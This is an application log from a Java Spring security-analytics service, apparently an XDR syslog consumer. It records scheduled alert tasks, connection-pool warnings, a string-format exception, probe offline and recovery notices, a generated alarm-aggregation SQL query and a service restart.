2026-05-19 12:05:00.678 [scheduling-2] INFO c.c.s.DeviceCollectTaskUpdateService - 批量更新完成,总计: 48,已更新: 1
2026-05-19 12:05:00.678 [scheduling-2] INFO c.c.service.DeviceStatsUpdateService - 设备采集探针任务时间更新完成,耗时: 434ms
2026-05-19 12:06:00.003 [scheduling-7] INFO c.c.s.NormalizeRuleHitTimeService - 开始执行泛化规则命中时间更新任务,时间:2026-05-19T12:06:00.003
2026-05-19 12:06:00.003 [scheduling-9] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:06:00.003 [log-processor-8] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:06:00.219 [scheduling-9] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:06:00.227 [log-processor-8] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:06:00.497 [log-processor-8] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 12:06:00.511 [scheduling-9] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 12:06:00.710 [scheduling-7] INFO c.c.s.NormalizeRuleHitTimeService - 从 syslog_normal_data 表统计到 0 条规则命中记录
2026-05-19 12:06:00.710 [scheduling-7] INFO c.c.s.NormalizeRuleHitTimeService - 从 syslog_normal_alarm 表统计到 0 条规则命中记录
2026-05-19 12:06:00.710 [scheduling-7] INFO c.c.s.NormalizeRuleHitTimeService - 合并后需要更新的规则数量:0
2026-05-19 12:06:00.866 [scheduling-7] INFO c.c.s.NormalizeRuleHitTimeService - 当前启用状态的规则数量:174
2026-05-19 12:06:00.866 [scheduling-7] INFO c.c.s.NormalizeRuleHitTimeService - 开始批量更新,规则总数:174,分批数:1
2026-05-19 12:06:00.866 [scheduling-7] INFO c.c.s.NormalizeRuleHitTimeService - 泛化规则命中时间更新任务完成,更新规则数:0,耗时:863ms
2026-05-19 12:07:00.014 [scheduling-8] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:07:00.014 [log-processor-9] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:07:00.240 [log-processor-9] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:07:00.245 [scheduling-8] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:07:00.510 [scheduling-8] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 12:07:00.537 [log-processor-9] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 12:31:44.951 [scheduling-1] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:31:44.951 [scheduling-10] INFO c.c.s.ProbeStatusCheckScheduler - ========== 开始探针状态检查 ==========
2026-05-19 12:31:44.952 [scheduling-2] INFO c.c.s.AlarmHealthCheckScheduler - ========== 开始执行告警健康检查 ==========
2026-05-19 12:31:44.952 [scheduling-4] INFO c.c.s.NormalizeRuleHitTimeService - 开始执行泛化规则命中时间更新任务,时间:2026-05-19T12:31:44.952
2026-05-19 12:31:44.953 [log-processor-10] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:31:45.147 [scheduling-3] WARN com.zaxxer.hikari.pool.PoolBase - HikariPool-SyslogConsumer - Failed to validate connection org.postgresql.jdbc.PgConnection@69700c78 (This connection has been closed.). Possibly consider using a shorter maxLifetime value.
2026-05-19 12:31:45.147 [scheduling-4] WARN com.zaxxer.hikari.pool.PoolBase - HikariPool-SyslogConsumer - Failed to validate connection org.postgresql.jdbc.PgConnection@1a3b07de (This connection has been closed.). Possibly consider using a shorter maxLifetime value.
2026-05-19 12:31:45.147 [scheduling-2] WARN com.zaxxer.hikari.pool.PoolBase - HikariPool-SyslogConsumer - Failed to validate connection org.postgresql.jdbc.PgConnection@5c5bdb82 (This connection has been closed.). Possibly consider using a shorter maxLifetime value.
2026-05-19 12:31:45.147 [scheduling-10] WARN com.zaxxer.hikari.pool.PoolBase - HikariPool-SyslogConsumer - Failed to validate connection org.postgresql.jdbc.PgConnection@64844fec (This connection has been closed.). Possibly consider using a shorter maxLifetime value.
2026-05-19 12:31:45.148 [scheduling-1] WARN com.zaxxer.hikari.pool.PoolBase - HikariPool-SyslogConsumer - Failed to validate connection org.postgresql.jdbc.PgConnection@5931135b (This connection has been closed.). Possibly consider using a shorter maxLifetime value.
2026-05-19 12:31:45.162 [scheduling-5] WARN com.zaxxer.hikari.pool.PoolBase - HikariPool-SyslogConsumer - Failed to validate connection org.postgresql.jdbc.PgConnection@5fe0d99 (This connection has been closed.). Possibly consider using a shorter maxLifetime value.
2026-05-19 12:31:45.829 [log-processor-10] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:31:46.151 [scheduling-2] INFO c.c.service.AlarmHealthCheckService - 告警表 alarm_20260519 健康检查: 4小时内数据量=0, 状态=异常
2026-05-19 12:31:46.152 [scheduling-2] ERROR c.c.s.AlarmHealthCheckScheduler - 告警健康检查执行异常: d != java.lang.String
java.util.IllegalFormatConversionException: d != java.lang.String
at java.util.Formatter$FormatSpecifier.failConversion(Formatter.java:4302)
at java.util.Formatter$FormatSpecifier.printInteger(Formatter.java:2793)
at java.util.Formatter$FormatSpecifier.print(Formatter.java:2747)
at java.util.Formatter.format(Formatter.java:2520)
at java.util.Formatter.format(Formatter.java:2455)
at java.lang.String.format(String.java:2940)
at com.common.service.AlarmHealthCheckService.generateAlarmNotification(AlarmHealthCheckService.java:119)
at com.common.service.AlarmHealthCheckService.performHealthCheck(AlarmHealthCheckService.java:48)
at com.common.schedule.AlarmHealthCheckScheduler.scheduledHealthCheck(AlarmHealthCheckScheduler.java:32)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.springframework.scheduling.support.ScheduledMethodRunnable.run(ScheduledMethodRunnable.java:84)
at org.springframework.scheduling.support.DelegatingErrorHandlingRunnable.run(DelegatingErrorHandlingRunnable.java:54)
at org.springframework.scheduling.concurrent.ReschedulingRunnable.run(ReschedulingRunnable.java:95)
at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
at java.util.concurrent.FutureTask.run(FutureTask.java:266)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$201(ScheduledThreadPoolExecutor.java:180)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:293)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
at java.lang.Thread.run(Thread.java:745)
2026-05-19 12:31:46.156 [scheduling-2] INFO c.c.s.AlarmHealthCheckScheduler - ========== 告警健康检查任务结束 ==========
2026-05-19 12:31:46.434 [log-processor-10] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 12:31:46.472 [scheduling-5] INFO c.c.service.DeviceStatsUpdateService - 开始执行设备统计更新任务...
2026-05-19 12:31:46.580 [scheduling-1] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:31:46.618 [scheduling-3] INFO c.c.s.RealtimeAnalysisScheduler - 执行规则: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=告警降噪分析规则-测试-V2, nextTime=2026-05-19T12:08, now=2026-05-19T12:31:44.951
2026-05-19 12:31:46.618 [scheduling-3] INFO c.c.s.impl.AnalysisRuleServiceImpl - 执行实时分析规则: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765
2026-05-19 12:31:46.633 [scheduling-10] INFO c.c.service.WecomNotificationService - 插入微信通知成功, ID: 85, 类型: probe_offline, 内容: 探针离线-1
2026-05-19 12:31:46.633 [scheduling-10] WARN c.c.service.WecomNotificationService - 发送微信告警通知 - 名称: 探针离线-1, 类型: probe_offline, 等级: 4, 内容: 【探针离线告警】
探针ID: 1
探针名称: ????????-01
探针IP: 192.168.0.124
版本: V1.0.0-20260509
离线时间: 2026-05-19 12:31:46
最后心跳: 2026-05-19 12:07:37
建议: 请检查探针服务是否正常运行
2026-05-19 12:31:46.633 [scheduling-10] INFO c.c.service.ProbeHeartbeatService - 发送探针离线告警成功, 通知ID: 85
2026-05-19 12:31:46.634 [scheduling-10] WARN c.c.service.ProbeHeartbeatService - 探针 1 已离线,最后心跳时间: 2026-05-19T12:07:37.703
2026-05-19 12:31:46.648 [scheduling-5] INFO c.c.service.DeviceStatsUpdateService - 设备统计更新完成,处理设备数:1,耗时:176ms
2026-05-19 12:31:46.649 [scheduling-5] INFO c.c.service.DeviceStatsUpdateService - 开始执行设备采集探针任务时间更新,时间: 2026-05-19T12:31:46.649
2026-05-19 12:31:46.649 [scheduling-5] INFO c.c.s.DeviceCollectTaskUpdateService - 开始批量更新设备采集任务时间,当前时间: 2026-05-19T12:31:46.649
2026-05-19 12:31:46.692 [HikariPool-SyslogConsumer housekeeper] WARN com.zaxxer.hikari.pool.HikariPool - HikariPool-SyslogConsumer - Thread starvation or clock leap detected (housekeeper delta=24m15s532ms337?s600ns).
2026-05-19 12:31:46.712 [scheduling-10] WARN c.c.s.ProbeStatusCheckScheduler - 探针状态检查完成,发现 1 个新离线探针, 离线阈值: 10分钟, 耗时: 1760ms
2026-05-19 12:31:46.712 [scheduling-10] WARN c.c.s.ProbeStatusCheckScheduler - 离线探针: collectId=1, ip=192.168.0.124, name=????????-01
2026-05-19 12:31:47.055 [scheduling-10] INFO c.c.s.ProbeStatusCheckScheduler - 探针统计: 总数=1, 在线=0, 离线=1
2026-05-19 12:31:47.055 [scheduling-10] INFO c.c.s.ProbeStatusCheckScheduler - ========== 探针状态检查结束 ==========
2026-05-19 12:31:47.103 [scheduling-5] INFO c.c.s.DeviceCollectTaskUpdateService - 批量更新完成,总计: 48,已更新: 1
2026-05-19 12:31:47.103 [scheduling-5] INFO c.c.service.DeviceStatsUpdateService - 设备采集探针任务时间更新完成,耗时: 454ms
2026-05-19 12:31:47.295 [scheduling-1] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 12:31:47.319 [scheduling-4] INFO c.c.s.NormalizeRuleHitTimeService - 从 syslog_normal_data 表统计到 0 条规则命中记录
2026-05-19 12:31:47.319 [scheduling-4] INFO c.c.s.NormalizeRuleHitTimeService - 从 syslog_normal_alarm 表统计到 0 条规则命中记录
2026-05-19 12:31:47.319 [scheduling-4] INFO c.c.s.NormalizeRuleHitTimeService - 合并后需要更新的规则数量:0
2026-05-19 12:31:47.360 [scheduling-3] INFO c.c.s.impl.RealtimeAnalysisEngine - 滚动窗口查询范围: 窗口大小=10m,查询时间范围=[2026-05-19 12:21:00, 2026-05-19 12:31:00]
2026-05-19 12:31:47.360 [scheduling-3] INFO c.c.s.impl.RealtimeAnalysisEngine - 开始执行实时规则: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=告警降噪分析规则-测试-V2, batchNo=20260519123146960, windowType=tumble, dataStartTime=2026-05-19 12:21:00, dataEndTime=2026-05-19 12:31:00
2026-05-19 12:31:47.471 [scheduling-4] INFO c.c.s.NormalizeRuleHitTimeService - 当前启用状态的规则数量:174
2026-05-19 12:31:47.471 [scheduling-4] INFO c.c.s.NormalizeRuleHitTimeService - 开始批量更新,规则总数:174,分批数:1
2026-05-19 12:31:47.471 [scheduling-4] INFO c.c.s.NormalizeRuleHitTimeService - 泛化规则命中时间更新任务完成,更新规则数:0,耗时:2519ms
2026-05-19 12:31:48.595 [scheduling-3] INFO c.c.s.impl.RealtimeAnalysisEngine - 生成的SQL: SELECT src_ip AS attack_ip,
dest_ip AS victim_ip,
origin_event_name AS alarm_name,
ARRAY_AGG(DISTINCT src_port) AS attack_port,
ARRAY_AGG(DISTINCT dest_port) AS victim_port,
MAX(event_level) AS alarm_level,
MODE() WITHIN GROUP (ORDER BY dest_domain) AS dns_info,
MODE() WITHIN GROUP (ORDER BY origin_event_type) AS alarm_type,
COUNT(dest_ip) AS log_count,
MAX(attack_result) AS attack_result,
ARRAY_AGG(DISTINCT http_req_header) AS http_req_header,
ARRAY_AGG(DISTINCT http_req_body) AS http_req_body,
ARRAY_AGG(DISTINCT http_resp_header) AS http_resp_header,
ARRAY_AGG(DISTINCT http_resp_body) AS http_resp_body,
ARRAY_AGG(DISTINCT http_url) AS victim_web_url,
ARRAY_AGG(DISTINCT id) AS origin_log_ids,
MIN(log_time) AS log_start_at,
MAX(log_time) AS log_end_at,
ARRAY_AGG(DISTINCT device_id) AS device_id,
ARRAY_AGG(DISTINCT payload) AS payload,
TUMBLE(log_time, INTERVAL '10 MINUTE') AS window_time
FROM syslog_normal_alarm AS t
WHERE log_time >= '2026-05-19 12:21:00' AND log_time < '2026-05-19 12:31:00' AND src_ip != '127.0.0.1' AND event_level >= 1
GROUP BY src_ip, dest_ip, origin_event_name, TUMBLE(log_time, INTERVAL '10 MINUTE')
2026-05-19 12:31:49.069 [scheduling-3] INFO c.c.s.impl.RealtimeAnalysisEngine - 规则执行成功: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, processedCount=0, alarmCount=0
2026-05-19 12:31:49.648 [scheduling-3] INFO c.c.s.i.RuleExecutionTimeServiceImpl - 更新规则下次执行时间,ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=告警降噪分析规则-测试-V2, windowType=tumble, nextExecuteTime=2026-05-19 12:41:00
2026-05-19 12:31:49.648 [scheduling-3] INFO c.c.s.RealtimeAnalysisScheduler - 本次调度执行规则数: 1, 跳过规则数: 0
2026-05-19 12:31:49.748 [http-nio-8089-exec-5] INFO c.c.service.WecomNotificationService - 插入微信通知成功, ID: 86, 类型: probe_recovery, 内容: 探针恢复-1
2026-05-19 12:31:49.748 [http-nio-8089-exec-5] WARN c.c.service.WecomNotificationService - 发送微信告警通知 - 名称: 探针恢复-1, 类型: probe_recovery, 等级: 1, 内容: 【探针恢复通知】
探针ID: 1
探针名称: ????????-01
探针IP: 192.168.0.124
恢复时间: 2026-05-19 12:31:49
状态: 已恢复正常
2026-05-19 12:31:49.748 [http-nio-8089-exec-5] INFO c.c.service.ProbeHeartbeatService - 发送探针恢复通知成功, 通知ID: 86
2026-05-19 12:31:49.748 [http-nio-8089-exec-5] INFO c.c.service.ProbeHeartbeatService - 探针 1 已恢复在线
2026-05-19 12:32:00.002 [scheduling-1] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:32:00.005 [log-processor-1] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:32:00.229 [scheduling-1] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:32:00.247 [log-processor-1] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:32:00.480 [log-processor-1] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 12:32:00.481 [scheduling-1] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 12:33:00.000 [scheduling-4] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:33:00.004 [log-processor-2] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:33:00.235 [log-processor-2] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:33:00.235 [scheduling-4] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:33:00.494 [scheduling-4] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 12:33:00.503 [log-processor-2] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 12:34:00.003 [scheduling-1] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:34:00.003 [log-processor-3] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:34:00.224 [scheduling-1] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:34:00.224 [log-processor-3] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:34:00.484 [log-processor-3] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 12:34:00.488 [scheduling-1] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 12:35:00.003 [scheduling-10] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:35:00.003 [log-processor-4] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:35:00.077 [scheduling-1] INFO c.c.service.DeviceStatsUpdateService - 开始执行设备统计更新任务...
2026-05-19 12:35:00.222 [scheduling-10] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:35:00.226 [log-processor-4] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:35:00.233 [scheduling-1] INFO c.c.service.DeviceStatsUpdateService - 设备统计更新完成,处理设备数:1,耗时:156ms
2026-05-19 12:35:00.233 [scheduling-1] INFO c.c.service.DeviceStatsUpdateService - 开始执行设备采集探针任务时间更新,时间: 2026-05-19T12:35:00.233
2026-05-19 12:35:00.233 [scheduling-1] INFO c.c.s.DeviceCollectTaskUpdateService - 开始批量更新设备采集任务时间,当前时间: 2026-05-19T12:35:00.233
2026-05-19 12:35:00.485 [scheduling-10] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 12:35:00.663 [scheduling-1] INFO c.c.s.DeviceCollectTaskUpdateService - 批量更新完成,总计: 48,已更新: 1
2026-05-19 12:35:00.663 [scheduling-1] INFO c.c.service.DeviceStatsUpdateService - 设备采集探针任务时间更新完成,耗时: 430ms
2026-05-19 12:35:00.849 [log-processor-4] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 12:36:00.012 [scheduling-5] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:36:00.012 [scheduling-1] INFO c.c.s.NormalizeRuleHitTimeService - 开始执行泛化规则命中时间更新任务,时间:2026-05-19T12:36:00.012
2026-05-19 12:36:00.012 [log-processor-5] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:36:00.236 [log-processor-5] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:36:00.236 [scheduling-5] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:36:00.470 [scheduling-5] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 12:36:00.519 [log-processor-5] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 12:36:00.699 [scheduling-1] INFO c.c.s.NormalizeRuleHitTimeService - 从 syslog_normal_data 表统计到 0 条规则命中记录
2026-05-19 12:36:00.699 [scheduling-1] INFO c.c.s.NormalizeRuleHitTimeService - 从 syslog_normal_alarm 表统计到 0 条规则命中记录
2026-05-19 12:36:00.699 [scheduling-1] INFO c.c.s.NormalizeRuleHitTimeService - 合并后需要更新的规则数量:0
2026-05-19 12:36:00.849 [scheduling-1] INFO c.c.s.NormalizeRuleHitTimeService - 当前启用状态的规则数量:174
2026-05-19 12:36:00.849 [scheduling-1] INFO c.c.s.NormalizeRuleHitTimeService - 开始批量更新,规则总数:174,分批数:1
2026-05-19 12:36:00.849 [scheduling-1] INFO c.c.s.NormalizeRuleHitTimeService - 泛化规则命中时间更新任务完成,更新规则数:0,耗时:837ms
2026-05-19 12:37:00.013 [scheduling-1] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:37:00.013 [log-processor-6] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:37:00.234 [log-processor-6] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:37:00.234 [scheduling-1] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:37:00.234 [log-processor-6] WARN c.c.service.AccessLogAlertService - 没有启用的算法配置,跳过本次处理
2026-05-19 12:37:00.491 [scheduling-1] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 12:38:00.015 [scheduling-6] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:38:00.015 [log-processor-7] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:38:00.234 [scheduling-6] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:38:00.233 [log-processor-7] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:38:00.563 [log-processor-7] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 12:38:00.563 [scheduling-6] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 12:39:00.015 [scheduling-3] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:39:00.015 [log-processor-8] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:39:00.236 [scheduling-3] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:39:00.236 [log-processor-8] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:39:00.535 [log-processor-8] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 12:39:00.859 [scheduling-3] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 12:40:00.004 [scheduling-1] INFO c.c.s.ProbeStatusCheckScheduler - ========== 开始探针状态检查 ==========
2026-05-19 12:40:00.004 [scheduling-3] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:40:00.004 [log-processor-9] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 12:40:00.078 [scheduling-6] INFO c.c.service.DeviceStatsUpdateService - 开始执行设备统计更新任务...
2026-05-19 12:40:00.227 [scheduling-3] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:40:00.227 [scheduling-1] INFO c.c.s.ProbeStatusCheckScheduler - 探针状态检查完成,所有探针在线, 耗时: 223ms
2026-05-19 12:40:00.227 [log-processor-9] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 12:40:00.233 [scheduling-6] INFO c.c.service.DeviceStatsUpdateService - 设备统计更新完成,处理设备数:1,耗时:155ms
2026-05-19 12:40:00.233 [scheduling-6] INFO c.c.service.DeviceStatsUpdateService - 开始执行设备采集探针任务时间更新,时间: 2026-05-19T12:40:00.233
2026-05-19 12:40:00.233 [scheduling-6] INFO c.c.s.DeviceCollectTaskUpdateService - 开始批量更新设备采集任务时间,当前时间: 2026-05-19T12:40:00.233
2026-05-19 12:40:00.378 [scheduling-1] INFO c.c.s.ProbeStatusCheckScheduler - 探针统计: 总数=1, 在线=1, 离线=0
2026-05-19 12:40:00.378 [scheduling-1] INFO c.c.s.ProbeStatusCheckScheduler - ========== 探针状态检查结束 ==========
2026-05-19 12:40:00.473 [scheduling-3] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 12:40:00.475 [log-processor-9] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 12:40:00.664 [scheduling-6] INFO c.c.s.DeviceCollectTaskUpdateService - 批量更新完成,总计: 48,已更新: 1
2026-05-19 12:40:00.664 [scheduling-6] INFO c.c.service.DeviceStatsUpdateService - 设备采集探针任务时间更新完成,耗时: 431ms
2026-05-19 12:40:55.056 [main] INFO com.syslogApplication - Starting syslogApplication using Java 1.8.0_121 on LAPTOP-ARDUR3N0 with PID 35676 (E:\GIT_GOSAME\ai-security-xdr\haobang-security-xdr\syslog-consumer\target\classes started by chenc in E:\GIT_GOSAME\ai-security-xdr\haobang-security-xdr)
2026-05-19 12:40:55.059 [main] INFO com.syslogApplication - No active profile set, falling back to 1 default profile: "default"
2026-05-19 12:40:55.062 [background-preinit] INFO o.h.validator.internal.util.Version - HV000001: Hibernate Validator 6.2.5.Final
2026-05-19 12:40:57.067 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
2026-05-19 12:40:57.068 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Elasticsearch repositories in DEFAULT mode.
2026-05-19 12:40:57.544 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 470 ms. Found 1 Elasticsearch repository interfaces.
2026-05-19 12:40:57.549 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
2026-05-19 12:40:57.551 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Reactive Elasticsearch repositories in DEFAULT mode.
2026-05-19 12:40:57.677 [main] INFO o.s.d.r.c.RepositoryConfigurationExtensionSupport - Spring Data Reactive Elasticsearch - Could not safely identify store assignment for repository candidate interface com.common.service.AppLogRepository; If you want this repository to be a Reactive Elasticsearch repository, consider annotating your entities with one of these annotations: org.springframework.data.elasticsearch.annotations.Document (preferred), or consider extending one of the following types with your repository: org.springframework.data.elasticsearch.repository.ReactiveElasticsearchRepository
2026-05-19 12:40:57.678 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 126 ms. Found 0 Reactive Elasticsearch repository interfaces.
2026-05-19 12:40:57.691 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
2026-05-19 12:40:57.692 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Redis repositories in DEFAULT mode.
2026-05-19 12:40:57.809 [main] INFO o.s.d.r.c.RepositoryConfigurationExtensionSupport - Spring Data Redis - Could not safely identify store assignment for repository candidate interface com.common.service.AppLogRepository; If you want this repository to be a Redis repository, consider annotating your entities with one of these annotations: org.springframework.data.redis.core.RedisHash (preferred), or consider extending one of the following types with your repository: org.springframework.data.keyvalue.repository.KeyValueRepository
2026-05-19 12:40:57.809 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 108 ms. Found 0 Redis repository interfaces.
2026-05-19 12:40:58.413 [main] INFO o.s.b.w.e.tomcat.TomcatWebServer - Tomcat initialized with port(s): 8089 (http)
2026-05-19 12:40:58.421 [main] INFO o.a.coyote.http11.Http11NioProtocol - Initializing ProtocolHandler ["http-nio-8089"]
2026-05-19 12:40:58.421 [main] INFO o.a.catalina.core.StandardService - Starting service [Tomcat]
2026-05-19 12:40:58.421 [main] INFO o.a.catalina.core.StandardEngine - Starting Servlet engine: [Apache Tomcat/9.0.65]
2026-05-19 12:40:58.589 [main] INFO o.a.c.c.C.[.[.[/xdrservice] - Initializing Spring embedded WebApplicationContext
2026-05-19 12:40:58.590 [main] INFO o.s.b.w.s.c.ServletWebServerApplicationContext - Root WebApplicationContext: initialization completed in 3465 ms
2026-05-19 12:40:58.640 [main] INFO o.s.b.f.a.AutowiredAnnotationBeanPostProcessor - Autowired annotation is not supported on static fields: private static com.common.service.DmColumnService com.syslogApplication.dmColumnService
2026-05-19 12:41:01.774 [main] INFO com.influx.InfluxDBClient - InfluxDB connection successful: ready for queries and writes
2026-05-19 12:41:02.162 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.insert] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.Insert]
2026-05-19 12:41:02.177 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.update] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.Update]
2026-05-19 12:41:02.196 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.deleteById] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.DeleteById]
